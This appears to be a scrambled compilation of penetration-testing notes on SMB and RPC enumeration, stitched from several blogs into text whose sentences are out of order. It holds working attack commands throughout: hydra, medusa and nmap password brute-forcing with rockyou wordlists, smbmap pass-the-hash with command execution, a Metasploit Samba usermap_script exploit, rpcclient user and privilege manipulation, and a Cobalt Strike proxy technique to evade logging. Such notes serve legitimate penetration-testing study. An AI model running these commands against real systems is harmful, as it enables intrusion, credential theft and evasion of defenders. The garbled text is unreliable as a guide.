While Port 139 is known technically as NBT over IP, Port 445 is SMB over IP. PORT STATE SERVICE First one - two Cobalt Strike sessions. Second - the attacker opens a socks4 proxy on port 7777 on his local Kali machine (10.0.0.5) by issuing: INet~Services <1c> - M S-1-5-21-1835020781-2383529660-3657267081-1005 LEWISFAMILY\kmem (2) lookupnames Convert names to SIDs The article is focused on Red Teamers, but Blue Teamers and Purple Teamers can also use these commands to test the security configurations they deployed. After verifying that the privilege was added using the lsaenumprivaccount command, we removed the privileges from the user using the lsaremoveacctrights command. Initial Access. rewardone in the PWK forums posted a neat script to easily get Samba versions: When you run this on a box running Samba, you get results: When in doubt, we can check the SMB version in a PCAP. In this communication, the child process can make requests from a parent process. adddriver Add a print driver It contains contents from other blogs for my quick reference. * nmap -sV --script=vulscan/vulscan.nse (https://securitytrails.com/blog/nmap-vulnerability-scan), masscan -p1-65535,U:1-65535 --rate=1000 10.10.10.x -e tun0 > ports, ports=$(cat ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/,$//'), nmap -Pn -sC -sV --script=vuln*.nse -p$ports 10.10.10.x -T5 -A (performs a full scan instead of a SYN scan to prevent getting flagged by firewalls), From Apache version to finding Ubuntu version -> ubuntu httpd versions. : Private key that is used for login. rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1006 New Folder (9) D 0 Sun Dec 13 05:26:59 2015 # lines. Forbid the creation and modification of files? With an anonymous null session you can access the IPC$ share and interact with services exposed via named pipes. If proper privileges are assigned, it is also possible to delete a user using rpcclient. 
querygroupmem Query group membership REG The createdomgroup command is used to create a group. samlogon Sam Logon certcube provides a detailed guide of OSCP enumeration with a step-by-step OSCP enumeration cheatsheet. There was a Forced Logging off on the Server and other important information. All this can be observed in the usage of the lsaenumprivaccount command. Replication READ ONLY great when smbclient doesn't work, smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip -x whoami # no work, smbmap -R $sharename -H $ip -A $fileyouwanttodownload -q, # Requires root or enough permissions to use tcpdump, # Will listen for the first 7 packets of a null login, # Will sometimes not capture or will print multiple. | Type: STYPE_DISKTREE_HIDDEN We can filter on ntlmssp.ntlmv2_response to see NTLMv2 traffic, for example. C$ NO ACCESS How I Won 90 Days OSCP Lab Voucher for Free, https://github.com/s0wr0b1ndef/OSCP-note/, These notes are not in the context of any machines I had during the OSCP lab or exam. shutdownabort Abort Shutdown (over shutdown pipe) result was NT_STATUS_NONE_MAPPED. *' # download everything recursively in the wwwroot share to /usr/share/smbmap. Nmap done: 1 IP address (1 host up) scanned in 10.93 seconds. S-1-5-21-1835020781-2383529660-3657267081-1011 LEWISFAMILY\operator (2) Connect to wwwroot share (try blank password), Nmap scans for SMB vulnerabilities (NB: can cause DoS), Enumerate SNMP device (places info in readable format), Enumerate file privileges (see here for discussion of file_priv), Check if current user is superuser (on = yes, off = no), Check user's privileges over table (pg_shadow). setform Set form As with the previous commands, the share enumeration command also comes with the feature to target a specific entity. Using rpcclient it is possible to create a group. 
Get help on commands setprinter Set printer comment S-1-5-21-1835020781-2383529660-3657267081-1015 LEWISFAMILY\bin (2) The tool is written in Perl and is basically . dfsenum Enumerate dfs shares --------------- ---------------------- lsaenumsid Enumerate the LSA SIDS Guest access disabled by default. openprinter Open printer handle With --pw-nt-hash, the password provided is the NT hash, #Use --no-pass -c 'recurse;ls' to list recursively with smbclient, #List with smbmap, without a folder it lists everything. When using enumdomgroup we see that we have different groups with their respective RIDs, and when this RID is used with queryusergroups it reveals information about that particular holder or RID. netname: IPC$ NETLOGON getdriver Get print driver information so let's run rpcclient with no options to see what's available: SegFault:~ cg$ rpcclient. Since we performed enumeration on different users, it is only fair to extend this to various groups as well. If these kinds of features are not enabled on the domain, then it is possible to brute-force the credentials on the domain. [Original] As I've been working through PWK/OSCP for the last month, one thing I've noticed is that enumeration of SMB is tricky, and different tools fail / succeed on different hosts. Dec 2, 2018, PWK Notes: SMB Enumeration Checklist [Updated]. Cracking Password. Hence, the credentials were successfully enumerated and the account can be taken over now. rpcclient is a utility initially developed to test MS-RPC functionality in Samba itself. smbclient (null session) enum4linux. This is what happens - the attacker (10.0.0.5) uses proxychains with impacket's reg utility to retrieve the hostname of the box at 10.0.0.7 (WS02) via the compromised (CS beacon) box 10.0.0.2 (WS01): keyName hklm\system\currentcontrolset\control\computername\computername. 
[+] User SMB session established on [ip] We will shine a light on the process or methodology for enumerating SMB services on the target system/server in this article. One of the first enumeration commands to be demonstrated here is the srvinfo command. -k, --kerberos Use kerberos (active directory) rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1004 -?, --help Show this help message Active Directory & Kerberos Abuse. | Anonymous access: Password attack (Brute-force) Brute-force service password. | execute arbitrary code via certain crafted "RPC related requests" aka the "RRAS Memory Corruption Vulnerability." logonctrl2 Logon Control 2 SYSVOL NO ACCESS, [+] Finding open SMB ports. Reconnecting with SMB1 for workgroup listing. Enumerating Windows Domains with rpcclient through SocksProxy == Bypassing Command Line Logging This lab shows how it is possible to bypass command-line argument logging when enumerating Windows environments, using Cobalt Strike and its socks proxy (or any other post-exploitation tool that supports socks proxying). enumdrivers Enumerate installed printer drivers Obviously the SIDs are different, but you can still pull down the usernames and start brute-forcing those other open services. (MS)RPC. 445/tcp open microsoft-ds path: C:\tmp samquerysecobj Query SAMR security object The next command that can be used is enumalsgroups. if [ -z $1 ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit; else rhost=$1; fi, if [ ! | Type: STYPE_DISKTREE This information includes the group name, description, attributes, and the number of members in that group. Many groups are created for a specific service. S-1-5-21-1835020781-2383529660-3657267081-500 LEWISFAMILY\Administrator (1) So it is also a good way to enumerate what kind of services might be running on the server; this can be done using enumdomgroup. 
list List available commands on You can also fire up Wireshark and list target shares with smbclient; you can use the anonymous listing explained above and after that find , # smbenum 0.2 - This script will enumerate SMB using every tool in the arsenal, echo -e "\n########## Getting Netbios name ##########", echo -e "\n########## Checking for NULL sessions ##########", output=`bash -c "echo 'srvinfo' | rpcclient $IP -U%"`, echo -e "\n########## Enumerating domains ##########", bash -c "echo 'enumdomains' | rpcclient $IP -U%", echo -e "\n########## Enumerating password and lockout policies ##########", echo -e "\n########## Enumerating users ##########", nmap -Pn -T4 -sS -p139,445 --script=smb-enum-users $IP, bash -c "echo 'enumdomusers' | rpcclient $IP -U%", bash -c "echo 'enumdomusers' | rpcclient $IP -U%" | cut -d[ -f2 | cut -d] -f1 > /tmp/$IP-users.txt, echo -e "\n########## Enumerating Administrators ##########", net rpc group members "Administrators" -I $IP -U%, echo -e "\n########## Enumerating Domain Admins ##########", net rpc group members "Domain Admins" -I $IP -U%, echo -e "\n########## Enumerating groups ##########", nmap -Pn -T4 -sS -p139,445 --script=smb-enum-groups $IP, echo -e "\n########## Enumerating shares ##########", nmap -Pn -T4 -sS -p139,445 --script=smb-enum-shares $IP, echo -e "\n########## Bruteforcing all users with 'password', blank and username as password", hydra -e ns -L /tmp/$IP-users.txt -p password $IP smb -t 1, hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt $ip smb, nmap -p445 --script smb-brute --script-args userdb=userfilehere,passdb=/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt $ip -vvvv. After establishing the connection, to get a grasp of the various commands that can be used, you can run help. It enumerates alias groups on the domain. 
| Anonymous access: | \\[ip]\share: Beyond the enumeration I show here, it will also help enumerate shares that are readable, and can even execute commands on writable shares. Using rpcclient we can enumerate usernames on those OSs just like a Windows OS. Enum4linux is a Linux alternative to enum.exe and is used to enumerate data from Windows and Samba hosts. rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1000 S-1-5-21-1835020781-2383529660-3657267081-1003 LEWISFAMILY\daemon (2) This can be obtained by running the lsaenumsid command. NT_STATUS_ACCESS_DENIED or NT_STATUS_BAD_NETWORK_NAME), # returns NT_STATUS_ACCESS_DENIED or even gives you a session. Passing the SID as a parameter in the lsacreateaccount command will enable us as an attacker to create an account object as shown in the image below. It is also possible to add and remove privileges for a specific user as well. sinkdata Sink data | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2370 Author: Pavandeep Singh is a Technical Writer, Researcher, and Penetration Tester. remark: IPC Service (Mac OS X) SeSecurityPrivilege 0:8 (0x0:0x8) After manipulating the privileges on the different users and groups, it is possible to enumerate the values of those specific privileges for a particular user using the lsalookupprivvalue command. 
great when smbclient doesn't work *[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " &, echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null, medusa -h $ip -u userhere -P /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt -M smbnt, msfconsole; use auxiliary/scanner/smb/smb_version; set RHOSTS $ip; run, msfconsole; use exploit/multi/samba/usermap_script; set lhost 10.10.14.x; set rhost $ip; run, Windows 7, 8, 8.1 and Windows Server 2003/2008/2012(R2)/2016, nmap -p 445 $ip --script=smb-vuln-ms17-010, hydra -l administrator -P /usr/share/wordlists/rockyou.txt -t 1 $ip smb, smbclient \\\\192.168.1.105\\ipc$ -U john. queryusergroups Query user groups deleteform Delete form It is possible to enumerate the SAM data through rpcclient as well. It is a software protocol that allows applications, PCs, and desktops on a local area network (LAN) to communicate with network hardware and to transmit data across the network. [hostname] <00> - M result was NT_STATUS_NONE_MAPPED The main application area of the protocol has been the Windows operating system series in particular, whose network services support SMB in a downward-compatible manner - which means that devices with newer editions can easily communicate with devices that have an older Microsoft operating system installed. SegFault:~/Documents/Evil cg$ hydra -l lewis -P common-passwords.txt 192.168.182.36 smb -V Adding it to the original post. During our previous demonstrations, we were able to enumerate the permissions and privileges of users and groups based on the RID of that particular user. to access through Web; FTP to file upload ==> Execute from web == webshell ; Password checking if you found one with other enumeration. lsaquerysecobj Query LSA security object S-1-5-21-1835020781-2383529660-3657267081-1002 LEWISFAMILY\daemon (1) result was NT_STATUS_NONE_MAPPED It is also possible to manipulate the privileges of that SID to make them either vulnerable to a particular privilege or remove the privilege of a user altogether. Host script results: An attacker can create an account object based on the SID of that user. May need to run a second time for success. S-1-5-21-1835020781-2383529660-3657267081-1009 LEWISFAMILY\tty (2) enumports Enumerate printer ports method. rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1013 The ability to manipulate a user doesn't end with creating a user or changing the password of a user. 
SRVSVC There are times where these share folders may contain sensitive or confidential information that can be used to compromise the target. Most secure. -s, --configfile=CONFIGFILE Use alternative configuration file | Current user access: READ/WRITE The Windows library URLMon.dll automatically tries to authenticate to the host when a page tries to access some content via SMB, for example: Which are used by some browsers and tools (like Skype), From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html, Similar to SMB Trapping, planting malicious files onto a target system (via SMB, for example) can elicit an SMB authentication attempt, allowing the NetNTLMv2 hash to be intercepted with a tool such as Responder. It accepts the group name as a parameter. | Current user access: This command helps the attacker enumerate the security objects or permissions and privileges related to the security as demonstrated below. | References: | Type: STYPE_IPC_HIDDEN 1. There are multiple methods to connect to a remote RPC service. MAC Address = 00-50-56-XX-XX-XX, [+] Finding open SMB ports. This article can serve as a reference for Red Team activists for attacking and enumerating the domain, but it can also be helpful for the Blue Team to understand and test the measures applied on the domain to protect the network and its users. At that time, the designers of rpcclient might have been unaware of the importance of this tool as a penetration testing tool. IPC$ IPC Remote IPC with a RID:[0x457] Hex 0x457 would = decimal. # Search the file in recursive mode and download it inside /usr/share/smbmap, #Download everything to current directory, mask: specifies the mask which is used to filter the files within the directory (e.g. "" Thus it might be worth a shot to try to manually connect to a share. --------------- ---------------------- | Risk factor: HIGH | smb-vuln-ms17-010: . 
This is purely my experience with CTFs, Tryhackme, Vulnhub, and Hackthebox prior to enrolling in OSCP. | Current user access: This will help in getting information such as the kind of password policies that have been enforced by the Administrator in the domain. lsaaddacctrights Add rights to an account | smb-vuln-ms06-025: rpcclient $> lookupnames lewis -c, --command=COMMANDS Execute semicolon separated cmds The below shows traffic captures that illustrate that the box 10.0.0.2 enumerates 10.0.0.7 using SMB traffic only: Below further proves that the box 10.0.0.2 (WS01, which acted as proxy) did not generate any sysmon logs and the target box 10.0.0.7 (WS02) logged a couple of events that most likely would not attract much attention from the blue teams: Note how only the SMB traffic between the compromised system and the DC is generated, but no new processes are spawned by the infected. To enumerate these shares the attacker can use netshareenum on rpcclient. rpcclient is a part of the Samba suite on Linux distributions. getprintprocdir Get print processor directory At this point in time, if you can use anonymous sessions, then there are some very useful commands within the tool. It can be observed that the OS version seems to be 10.0. After that command was run, rpcclient will give you the most excellent "rpcclient> " prompt. --usage Display brief usage message, Common samba options: It can be enumerated through rpcclient using the lsaenumsid command. While having some privileges it is also possible to create a user within the domain using rpcclient. It can be done with the help of the createdomuser command with the username that you want to create as a parameter. 
This detail includes the path of the share and remarks; it will indicate if the share has a password for access, it will tell the number of users accessing the share, and what kind of access is allowed on the share. It is possible to target the group using the RID that was extracted while running enumdomgroup. When dealing with SMB an attacker is bound to deal with the network shares on the domain. # lines. On most Linuxes, we have tab auto-complete of commands, which extends into rpcclient commands. echoaddone Add one to a number It also includes the commands that I used on platforms such as Vulnhub and Hack the Box. getprinter Get printer info This command retrieves the domain, server, users on the system, and other relevant information. rpcclient $> help This command can help with the enumeration of the LSA Policy for that particular domain. Similarly, enumerating the Primary Domain Information, such as the role of the machine and the native mode of the domain, can be done using the dsroledominfo command as demonstrated. |_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/ -U, --user=USERNAME Set the network username In the demonstration, the user with RID 0x1f4 was enumerated regarding their password properties. Assumes valid machine account to this domain controller. If I'm missing something, leave a comment. D 0 Thu Sep 27 16:26:00 2018 To enumerate the password properties on the domain, the getdompwinfo command can be used. lsaremoveacctrights Remove rights from an account dsenumdomtrusts Enumerate all trusted domains in an AD forest . 
Enter WORKGROUP\root's password: